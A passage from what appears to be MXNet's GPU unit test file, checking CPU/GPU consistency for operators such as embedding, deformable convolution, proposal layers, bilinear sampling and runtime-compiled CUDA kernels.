{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
def check_rnn_layer(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c._bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
@pytest.mark.serial
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
